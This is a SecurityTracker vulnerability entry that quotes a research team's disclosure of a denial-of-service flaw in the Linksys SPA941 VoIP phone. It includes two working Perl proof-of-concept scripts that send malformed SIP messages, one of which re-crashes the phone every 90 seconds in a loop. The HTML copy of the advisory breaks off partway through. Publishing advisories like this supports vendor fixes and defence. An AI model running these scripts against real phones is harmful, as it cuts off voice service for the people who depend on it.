SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Device (VoIP/Phone/FAX)  >   Linksys Router Vendors:   Linksys
Linksys SPA941 Phone Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1017957
SecurityTracker URL:  http://securitytracker.com/id/1017957
CVE Reference:   CVE-2007-2270   (Links to External Site)
Updated:  May 12 2008
Original Entry Date:  Apr 25 2007
Impact:   Denial of service via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): model SPA941, version 5.1.5
Description:   A vulnerability was reported in the Linksys SPA941 phone. A remote user can cause denial of service conditions.

A remote user can send a specially crafted SIP message to cause the target device to reboot. The vulnerability can be triggered with the '\377' character in the SIP field.

The vendor was notified on April 4, 2007.

The Madynes research team at INRIA Lorraine discovered this vulnerability using the Madynes VoIP fuzzer.
Impact:   A remote user can cause the target device to reboot.
Solution:   No solution was available at the time of this entry.

The vendor plans to issue a fix.
Vendor URL:  www.linksys.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Tue, 24 Apr 2007 14:34:27 +0200
Subject:  [Full-disclosure] Linksys SPA941 remote DOS with \377 character

This is a multi-part message in MIME format.

--===============1338559389==
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_015F_01C7867D.A975EBA0"

This is a multi-part message in MIME format.

------=_NextPart_000_015F_01C7867D.A975EBA0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

MADYNES Security Advisory 

 

 <http://madynes.loria.fr/> http://madynes.loria.fr

 

 

Title: Linksys SPA941 remote DOS with \377 character

 

Discovery Date: 01/02/2007 

Vendor notification: 4/04/2007 and 17/04/2007

Release Date: 24/04/2007

 

 

Severity: 

      Moderate - Denial of Service

 

Advisory ID:KIHP3

 

Vulnerability in Linksys SPA941



Synopsis: After sending a crafted SIP messages the device immediately
reboots. The phone does not check properly the metacharacters  \377 in the
SIP field.

 

The vendor was informed and future firmware will be available. This
vulnerability was identified by the Madynes research team at INRIA Lorraine,
using the Madynes VoIP fuzzer.

 

Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol for
VoIP signalization. SIP is an ASCII based INVITE message is used to initiate
and maintain a communication session.  

 


Configuration of our device:

*	Software Version:5.1.5 
*	IP-Address obtained by DHCP as 192.168.1.107 
*	User Name: linksys

Vulnerability:

It may reboot and/or replies with invalid messages. The phone is not able to
handle well the character \377 (full byte) in a message. Depending where
this character is located the phone may reboot (e.g. in any section of the
FROM header). If this character is located anywhere else it may modify the
content of the reply messages generated by the phone as showed in the
exploit.  It looks like a format string vulnerability, but no effort to
investigate firmware was done.



Exploit 1)



In this exploit we set a \377 character before every carriage return. The
Replies are modified in their Status line and most of the headers are
erased. Different behavior exists depending in the quantity of \377
characters and their location. Linksys IP Phone SPA941 (firmware 5.1.5), can
not cope with the \337 characters in the FROM field when the real (IP port
in the IP packet) is different from the IP port in the SIP-FROM field .

 


Exploit 1)

To run the exploit the file linksys-5.1.5.pl should be launched (assuming
our configurations) as:

perl linksys-5.1.5.pl 192.168.1.107 5060 linksys



POC: 1 

 

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

 

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

        Proto=>'udp',

        PeerAddr=>$ARGV[0]);

 

                        

$msg = 

"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r

Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r

Max-Forwards: 70\377\r

To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r

From: <sip:tucuman\@192.168.1.2>;tag=00\377\r

Call-ID: tucu\@192.168.1.2\377\r

CSeq: 24865 INVITE\377\r

Contact: <sip:tucu\@192.168.1.2>\377\r

Supported: 100rel\377\r

Content-Length: 0\377\r

\r\n";

 

$socket->send($msg);

 

 

 

 

Exploit 2)

 

In order to remote reboot the phone the following PC will work

 

If the phone is called with the POC 2 it will ring. When answering it
reboots immediately. If not it will reboot after some time.

 

The POC will send the killer message every 90 seconds -the time needed for a
reboot and performs the effective DOS. It also opens a socket on the local
machine to avoid sending RST to the phone. The same can be obtained  with a
firewall or a netcat.

 

POC 2:

            

Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>

            Eg. Perl script.pl 101 152.81.114.195 152.81.12.93 5060

 

Script Code:

 

#!/usr/bin/perl

 

use IO::Socket;

 

#die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless
($ARGV[2]);

die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless
($ARGV[0]);

 

my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort =>
$ARGV[3], Proto => 'udp'); 

$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060',
Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');

 

$touser=$ARGV[0];

$target=$ARGV[1];

$sourceaddress=$ARGV[2];

$sourceport=$ARGV[3];

$high=2000;

$low=1;

$fromuserid = int(rand( $high-$low+1 ) ) + $low;

my $cseq = "INVITE";

 

$msg = "INVITE sip:$touser\@$target SIP/2.0\r

Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r

From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r

To: Receiver <sip:$touser\@$target>\r

Call-ID: 10\@$sourceaddress\r

CSeq: 1 $cseq\r

Contact: 779 <sip:$fromuserid\@$sourceaddress>\r

Expires: 1200\r

Max-Forwards: 70\r

Content-Type: application/sdp\r

Content-Length: 133\r

\r

v=0\r

o=0 0 0 IN IP4 $sourceaddress\r

s=Session SDP\r

c=IN  IP4 $sourceaddress\r

t=0 0\r

m=audio 9876 RTP/AVP 0\r

a=rtpmap:0 PCMU/8000\r";

 

$sock or die "no socket :$!";

while (1){

            $socket->send($msg);

            sleep 90;

            }

 

 

Impact: 

A malicious user can remotely crash and perform a denial of service attack
by sending one crafted SIP   messages. This is conceptually similar to the
"ping of death". 

 

Resolution:

 

Fixed software will be available and following recommended best practices
(ie segregating VOIP traffic from data) will be protected from malicious
traffic in most situations. 

 

>From Linksys response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure
firewall, should not affect an entire network and in most cases should
easily be contained by the local network management entity.  Linksys will
directly address this issue with a future release of the phone firmware.

 

 

Distribution: The advisory will be posted on the following websites:

 

madynes.loria.fr  

 

The advisory will be posted to the following mailing lists

 

Voipsec : voipsec@voipsa.org.

fulldisclosure: full-disclosure@lists.grok.org.uk

 

 

Credits:

 

            Balamurugan Karpagavinayagam (Software engineer)

            Humberto J. Abdelnur (Ph.D Student)

            Radu State (Ph.D)

            Olivier Festor (Ph.D)

 

This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using the Madynes VoIP fuzzer.

 

 

 

Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.

 

 

 


------=_NextPart_000_015F_01C7867D.A975EBA0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html xmlns:v=3D"urn:schemas-microsoft-com:vml" =
xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns:st1=3D"urn:schemas-microsoft-com:office:smarttags" =
xmlns=3D"http://www.w3.org/TR/REC-html40">

<head>
<META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; =
charset=3Dus-ascii">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"State"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"PlaceType"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"PlaceName"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"place"/>
<o:SmartTagType =
namespaceuri=3D"urn:schemas-microsoft-com:office:smarttags"
 name=3D"PersonName"/>
<!--[if !mso]>
<style>
st1\:*{behavior:url(#default#ieooui) }
</style>
<![endif]-->
<style>
<!--
 /* Font Definitions */
 @font-face
	{font-family:Wingdings;
	panose-1:5 0 0 0 0 0 0 0 0 0;}
 /* Style Definitions */
 p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:12.0pt;
	font-family:"Times New Roman";}
a:link, span.MsoHyperlink
	{color:blue;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{color:purple;
	text-decoration:underline;}
span.EmailStyle17
	{mso-style-type:personal-compose;
	font-family:Arial;
	color:windowtext;}
@page Section1
	{size:595.3pt 841.9pt;
	margin:70.85pt 70.85pt 70.85pt 70.85pt;}
div.Section1
	{page:Section1;}
 /* List Definitions */
 @list l0
	{mso-list-id:714505760;
	mso-list-template-ids:-1094920750;}
@list l0:level1
	{mso-level-number-format:bullet;
	mso-level-text:\F0B7;
	mso-level-tab-stop:.5in;
	mso-level-number-position:left;
	text-indent:-.25in;
	mso-ansi-font-size:10.0pt;
	font-family:Symbol;}
ol
	{margin-bottom:0in;}
ul
	{margin-bottom:0in;}
-->
</style>

</head>

<body lang=3DFR link=3Dblue vlink=3Dpurple>

<div class=3DSection1>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>MADYNES Security
Advisory <o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
style=3D'font-size:10.0pt;font-family:"Courier New"'><a
href=3D"http://madynes.loria.fr/"><span =
lang=3DEN-US>http://madynes.loria.fr</span></a></span></font><font
size=3D2 face=3D"Courier New"><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:
"Courier New"'><o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier New"'>Title: =
Linksys
SPA941 remote DOS with \377 character<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Discovery Date:
01/02/2007 <o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier New"'>Vendor
notification: 4/04/2007 and 17/04/2007<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Release Date:
24/04/2007<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Severity: <o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Moderate -
Denial of Service<o:p></o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-US style=3D'font-size:10.0pt;font-family:"Courier =
New"'>Advisory ID:KIHP3<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Vulnerability in =
Linksys SPA941<br>
<br>
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Synopsis: After sending a crafted SIP =
messages the
device immediately reboots. The phone does not check properly the
metacharacters <font color=3Dblack><span =
style=3D'color:black'>&nbsp;\377</span></font>
in the SIP field.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>The vendor was informed and future firmware =
will be
available. This vulnerability was identified by the Madynes research =
team at
INRIA Lorraine, using the Madynes VoIP =
fuzzer.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Background: SIP is the IETF standardized =
(RFCs 2543
and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE =
message
is used to initiate and maintain a communication session.&nbsp; =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'><br>
Configuration of our device:<o:p></o:p></span></font></p>

<ul type=3Ddisc>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>Software =
Version:</span></font><font
     color=3Ddarkblue><span style=3D'color:darkblue'>5.1.5</span></font> =
<o:p></o:p></li>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span lang=3DEN-US =
style=3D'font-size:12.0pt'>IP-Address
     obtained by DHCP as 192.168.1.107 <o:p></o:p></span></font></li>
 <li class=3DMsoNormal =
style=3D'color:black;mso-margin-top-alt:auto;mso-margin-bottom-alt:
     auto;mso-list:l0 level1 lfo1'><font size=3D3 color=3Dblack
     face=3D"Times New Roman"><span style=3D'font-size:12.0pt'>User =
Name: linksys<o:p></o:p></span></font></li>
</ul>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Vulnerability:<br>
<br>
It may reboot and/or replies with invalid messages. The phone is not =
able to
handle well the character \377 (full byte) in a message. Depending where =
this
character is located the phone may reboot (e.g. in any section of the =
FROM
header). If this character is located anywhere else it may modify the =
content
of the reply messages generated by the phone as showed in the exploit. =
&nbsp;It looks
like a format string vulnerability, but no effort to investigate =
firmware was done.<br>
<br>
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Exploit 1)<br>
<br>
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>In this exploit we =
set a \377
character before every carriage return. The Replies are modified in =
their
Status line and most of the headers are erased. Different behavior =
exists
depending in the quantity of \377 characters and their location. =
</span></font><span
lang=3DEN-GB>Linksys IP Phone SPA941 (firmware 5.1.5), can not cope with =
the \337
characters in the FROM field when the real (IP port in the IP packet) is
different from the IP port in the SIP-FROM field .</span><font size=3D2
face=3DArial><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'><br>
Exploit 1)<br>
<br>
To run the exploit the file linksys-5.1.5.pl should be launched =
(assuming our
configurations) as:<br>
<br>
perl linksys-5.1.5.pl 192.168.1.107 5060 linksys<br>
<br>
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>POC: 1 =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>#!/usr/bin/perl<o:p></o:p></span><=
/font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>use =
IO::Socket::INET;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>die &quot;Usage $0 =
&lt;dst&gt;
&lt;port&gt; &lt;username&gt;&quot; unless =
($ARGV[2]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>$socket=3Dnew
IO::Socket::INET-&gt;new(PeerPort=3D&gt;$ARGV[1],<o:p></o:p></span></font=
></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp; </span></font><font
color=3Dblack><span lang=3DPT-BR =
style=3D'color:black'>Proto=3D&gt;'udp',<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp; PeerAddr=3D&gt;$ARGV[0]);<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR =
style=3D'font-size:12.0pt;color:black'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>$msg =3D =
<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>&quot;INVITE
sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>Via: SIP/2.0/UDP
192.168.1.2;rport;branch=3D00\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Max-Forwards: =
70\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>To: lynksys
&lt;sip:$ARGV[2]\@$ARGV[0]&gt;\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>From:
&lt;sip:tucuman\@192.168.1.2&gt;;tag=3D00\377\r<o:p></o:p></span></font><=
/p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Call-ID:
tucu\@192.168.1.2\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>CSeq: 24865 =
INVITE\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DPT-BR style=3D'font-size:12.0pt;color:black'>Contact: =
&lt;sip:tucu\@192.168.1.2&gt;\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Supported: =
100rel\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US style=3D'font-size:12.0pt;color:black'>Content-Length: =
0\377\r<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>\r\n&quot;;<o:p></o:p></span></fon=
t></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>$socket-&gt;send($msg);<o:p></o:p>=
</span></font></p>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'><o:p>&nbsp;</o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 color=3Dblack face=3D"Times New =
Roman"><span
lang=3DEN-US =
style=3D'font-size:12.0pt;color:black'>&nbsp;</span></font><font =
size=3D2
face=3DArial><span lang=3DEN-US =
style=3D'font-size:10.0pt;font-family:Arial'><o:p></o:p></span></font></p=
>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>Exploit 2)<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'>In order to remote reboot the phone the =
following PC
will work<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-US
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt'>If the phone is called with the POC 2 it will =
ring.
When answering it reboots immediately. If not it will reboot after some =
time.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt'>The POC will send the killer message every 90 =
seconds
&#8211;the time needed for a reboot and performs the effective DOS. It =
also
opens a socket on the local machine to avoid sending RST to the phone. =
The same
can be obtained &nbsp;with a firewall or a =
netcat.<o:p></o:p></span></font></p>

<p class=3DMsoNormal><b><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold'><o:p>&nbsp;</o:p></span></fon=
t></b></p>

<p class=3DMsoNormal><b><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold'>POC =
2:<o:p></o:p></span></font></b></p>

<p class=3DMsoNormal><b><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <o:p></o:p></span></font></b></p>

<p class=3DMsoNormal><b><i><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold;font-style:italic'>Command</sp=
an></font></i></b><b><i><font
face=3D"Courier New"><span lang=3DEN-GB style=3D'font-family:"Courier =
New";
font-weight:bold;font-style:italic'>: </span></font></i></b><font =
size=3D2
face=3D"Courier New"><span lang=3DEN-GB =
style=3D'font-size:10.0pt;font-family:"Courier New"'>perl
script.pl &lt;username&gt; &lt;dst_IP&gt; &lt;SourceIp&gt; =
&lt;sourceport&gt;<o:p></o:p></span></font></p>

<p class=3DMsoNormal><font size=3D2 face=3D"Courier New"><span =
lang=3DEN-GB
style=3D'font-size:10.0pt;font-family:"Courier =
New"'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
Eg. Perl
script.pl 101&nbsp;152.81.114.195 152.81.12.93 =
5060</span></font><b><i><span
lang=3DEN-GB =
style=3D'font-weight:bold;font-style:italic'><o:p></o:p></span></i></b></=
p>

<p class=3DMsoNormal><b><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold'><o:p>&nbsp;</o:p></span></fon=
t></b></p>

<p class=3DMsoNormal><b><i><font size=3D3 face=3D"Times New Roman"><span =
lang=3DEN-GB
style=3D'font-size:12.0pt;font-weight:bold;font-style:italic'>Script =
Code:<o:p></o:p></span></font></i></b></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'><o:p>&nbsp;</o:p></span></font></p>

<p class=3DMsoNormal style=3D'text-autospace:none'><font size=3D2 =
face=3D"Courier New"><span
lang=3DEN-GB style=3D'font-size:10.0pt;font-family:"Courier =
New"'>#!/usr/bin/perl<o:p></o:p></span></font></p>

